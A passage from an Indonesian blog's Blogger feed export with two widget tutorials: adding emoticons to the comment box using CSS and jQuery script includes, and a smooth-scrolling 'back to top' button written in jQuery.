src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/66.gif&#39;/&amp;gt;&lt;br /&gt;b-(&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/62.gif&#39;/&amp;gt;&lt;br /&gt;:-L&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/14.gif&#39;/&amp;gt;&lt;br /&gt;x(&lt;br /&gt;&amp;lt;img border=&#39;0&#39; src=&#39;http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/24.gif&#39;/&amp;gt;&lt;br /&gt;=))&amp;lt;/b&amp;gt;&lt;br /&gt;&amp;lt;center&amp;gt;&amp;lt;blink&amp;gt;&amp;lt;a
 
href=&quot;http://abrian-pamungkaz.blogspot.com/2013/01/cara-memasang-emoticon-di-kotak-komentar.html&quot;
 target=&quot;_blank&quot;&amp;gt;Pasang Emoticon 
!&amp;lt;/a&amp;gt;&amp;lt;/blink&amp;gt;&amp;lt;/center&amp;gt;&lt;/span&gt;&lt;/blockquote&gt;
9. Simpan&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Selamat Mencoba&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;2. EMOTICON KEDUA&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img alt=&quot;Cara Mudah Membuat Emoticon Di Kotak Komentar Blog &quot; border=&quot;0&quot; height=&quot;212&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9cAKkZbBdGA09_cLdYEb7Mmpo_m4wb78g7mC8QVGfhad_dzmEtXTnKW7o_457_OIGClV7ZqhZF2Yn3b0iY1q0X8pJU0VOBwykZ-VZSGgYdz1j0KSSQGZ6Fu51ccZ_Mma1TDoag07DwOkh/s400/emoticon.jpg&quot; title=&quot;Cara Mudah Membuat Emoticon Di Kotak Komentar Blog &quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;Login ke akun blogger lo bro&lt;/span&gt;&lt;/li&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;
&lt;/span&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;klik di&amp;nbsp;&lt;b&gt;Design&lt;/b&gt;/tata letak ok bro&lt;/span&gt;&lt;/li&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;
&lt;/span&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;pilih&amp;nbsp;&lt;b&gt;Edit HTML&lt;/b&gt;, Centang pada&amp;nbsp;&lt;b&gt;Expand Widget Templates&lt;/b&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;
&lt;/span&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;Untuk Antisipasi kesalahan bro, Silahkan&amp;nbsp;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;BACKUP&lt;/span&gt;&lt;/b&gt;&amp;nbsp;dulu data lo ya bro.&lt;/span&gt;&lt;/li&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;
&lt;/span&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;tekan tombol di keyboard bro,&amp;nbsp;&lt;b&gt;Ctrl+F&lt;/b&gt;, kemudian carilah bro kode&amp;nbsp;&lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;
&lt;/span&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;lalu copy kode berikut bro:&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;font-family: &#39;Times New Roman&#39;; margin: 0px;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;blockquote&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;lt;style type=&#39;text/css&#39;&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
.emoWrap {&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; background-color:transparent;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; border:none;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; padding:10px 14px;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; color:black;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; font:bold 12px Tahoma,Arial,Sans-Serif;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; text-align:center;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
}&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
img.emo, input.emoKey {&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; display:inline-block; /* Penting! */&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; *display:inline;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; vertical-align:middle;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
}&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
input.emoKey {&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; border:1px solid #ccc;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; background-color:white;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; font:bold 11px Arial,Sans-Serif;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; padding:1px 2px;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; margin:0px 0px 0px 2px;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; color:black;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
}&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;lt;/style&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;lt;script src=&#39;http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js&#39; type=&#39;text/javascript&#39;/&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;lt;script src=&#39;https://republicofnote.googlecode.com/svn/trunk/emoticon%20di%20kotak%20komentar&#39; type=&#39;text/javascript&#39;/&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;lt;script type=&#39;text/javascript&#39;&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
//&amp;lt;![CDATA[&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
var emoRange &amp;nbsp; &amp;nbsp;= &quot;#comments p, div.emoWrap&quot;,&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; &amp;nbsp; putEmoAbove = &quot;iframe#comment-editor&quot;,&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;nbsp; &amp;nbsp; emoMessage &amp;nbsp;= &quot;Untuk menyisipkan emoticon setidaknya anda harus menambahkan satu spasi di awal simbol.&quot;;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
//]]&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;
&amp;lt;/script&amp;gt;&lt;/span&gt; &lt;/div&gt;
&lt;/blockquote&gt;
&lt;ul style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/ul&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;strike&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/strike&gt;
&lt;li style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: small;&quot;&gt;&amp;nbsp;Lalu paste-kan bro&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;diAtas&lt;/span&gt;&amp;nbsp;kode&amp;nbsp;&lt;span style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Mudah bukan bro ? ? kini lo bro sudah bisa menggunakan 2 emoticon tersebut di blog lo bro.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Selamat Mencoba ya bro . . .&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/401160905386440337/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/01/cara-memasang-emoticon-di-kotak-komentar.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/401160905386440337'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/401160905386440337'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2013/01/cara-memasang-emoticon-di-kotak-komentar.html' title='Cara Memasang Emoticon Di Kotak Komentar'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga-gfNePlvFQTpQ79DSg1FpT746O4yWrsPhlGmxCHRlg6xobV5F_QlGbCYGfjiaDNVzP-P8VtTU4ybX9vJdu8QemO7iJghhAZ_8GgxT9O9t1e6aGgbJL6OKWt6ZBChtKz_2UoXKo2iSzg/s72-c/emoticon.JPG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-666364274778285634</id><published>2013-01-24T06:01:00.000-08:00</published><updated>2013-01-25T03:52:58.996-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="widgets"/><title type='text'>Cara Membuat Tombol Back To Top Dengan CSS</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-VHxeG9AlJbHKLnRIBew-QlSlsS__P8Su6Ja1VlgXQtTtsvX03pPFt7w5I9l5ZlxhRu7ka-g_ZMN_O7Iowtnhq0I3_a98FprJqWQhwcOWTlHoCqs_mtolGGpylxMZ2K0pUopKbbEGhVFX/s1600/back-to-top-navigation.png&quot; rel=&quot;nofollow&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Cara Membuat Tombol Back To Top Dengan Efek Gulir Halur&quot; border=&quot;0&quot; height=&quot;182&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-VHxeG9AlJbHKLnRIBew-QlSlsS__P8Su6Ja1VlgXQtTtsvX03pPFt7w5I9l5ZlxhRu7ka-g_ZMN_O7Iowtnhq0I3_a98FprJqWQhwcOWTlHoCqs_mtolGGpylxMZ2K0pUopKbbEGhVFX/s1600/back-to-top-navigation.png&quot; title=&quot;Cara Membuat Tombol Back To Top Dengan Efek Gulir Halur&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Pada kesempatan kali ini saya akan berbagi kepada sobat tentang bagaimana &lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/2013/01/cara-membuat-tombol-back-to-top-dengan.html&quot;&gt;&lt;b&gt;Cara Membuat Tombol Back To Top Dengan Efek Gulir Halur pada Blogspot&lt;/b&gt;&lt;/a&gt;
 dan beberapa waktu yang lalu, saya juga telah memposting sebuah artikel
 yang hampir sama dengan postingan kali ini, namun tombol &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;back to top&lt;/b&gt;&lt;/span&gt; yang pertama tersebut mempunyai efek yang agak sedikit kaku dan tidak mempunyai efek apa-apa.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Nah jika sobat tertarik untuk memasang tombol to top&lt;b&gt; ini&lt;/b&gt;, ini dia cekidot:&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Login ke blogger&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Tata Letak&lt;/b&gt; » &lt;b&gt;Add Gadget&lt;/b&gt; » &lt;b&gt;Pilih HTLM/Javascript&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;Copy kode di bawah ini dan pastekan kedalam box &lt;b&gt;HTML/Javascript&lt;/b&gt; tersebut&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;div style=&quot;margin: 5px 20px 20px;&quot;&gt;
&lt;div class=&quot;smallfont&quot; style=&quot;margin-bottom: 2px;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;alt2&quot; style=&quot;background: #A9F5A9; border: 1px inset; margin: 0px; padding: 3px;&quot;&gt;
&lt;div&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;lt;script type=&quot;text/javascript&quot; src=&quot;http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js&quot;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;lt;script type=&quot;text/javascript&quot; &amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;var scrolltotop={&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; //startline: Integer. Number of pixels from top of doc scrollbar is scrolled before showing control&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; //scrollto: Keyword (Integer, or &quot;Scroll_to_Element_ID&quot;). How far to scroll document up when control is clicked on (0=top).&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; setting: {startline:100, scrollto: 0, scrollduration:1000, fadeduration:[500, 100]},&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; controlHTML: &#39;&amp;lt;img src=&quot;&lt;span style=&quot;color: red;&quot;&gt;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQAL9APEwARpMti8Z_n1V9r8F8QIZR3XdMxV5tO08mEpwxPRXYlsBOpK28CgntD2ezgMaTEnNxEuwgNgZvuSXbrfHtNsAhxDDBbGXzW1jLHfn5MX51GPvwPRUzUSrklxfvg6ctuXZNK1JA/s1600/navigate-up-icon.png&lt;/span&gt;&quot; /&amp;gt;&#39;, //HTML for control, which is auto wrapped in DIV w/ ID=&quot;topcontrol&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; controlattrs: {offsetx:5, offsety:5}, //offset of control relative to right/ bottom of window corner&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; anchorkeyword: &#39;#top&#39;, //Enter href value of HTML anchors on the page that should also act as &quot;Scroll Up&quot; links&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; state: {isvisible:false, shouldvisible:false},&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; scrollup:function(){&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; if (!this.cssfixedsupport) //if control is positioned using JavaScript&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this.$control.css({opacity:0}) //hide control immediately after clicking it&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; var dest=isNaN(this.setting.scrollto)? this.setting.scrollto : parseInt(this.setting.scrollto)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; if (typeof dest==&quot;string&quot; &amp;amp;&amp;amp; jQuery(&#39;#&#39;+dest).length==1) //check element set by string exists&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; dest=jQuery(&#39;#&#39;+dest).offset().top&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; else&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; dest=0&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this.$body.animate({scrollTop: dest}, this.setting.scrollduration);&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; },&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; keepfixed:function(){&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; var $window=jQuery(window)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; var controlx=$window.scrollLeft() + $window.width() - this.$control.width() - this.controlattrs.offsetx&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; var controly=$window.scrollTop() + $window.height() - this.$control.height() - this.controlattrs.offsety&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this.$control.css({left:controlx+&#39;px&#39;, top:controly+&#39;px&#39;})&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; },&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; togglecontrol:function(){&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; var scrolltop=jQuery(window).scrollTop()&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; if (!this.cssfixedsupport)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this.keepfixed()&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; this.state.shouldvisible=(scrolltop&amp;gt;=this.setting.startline)? true : false&lt;/span&gt;&lt;br /&gt;
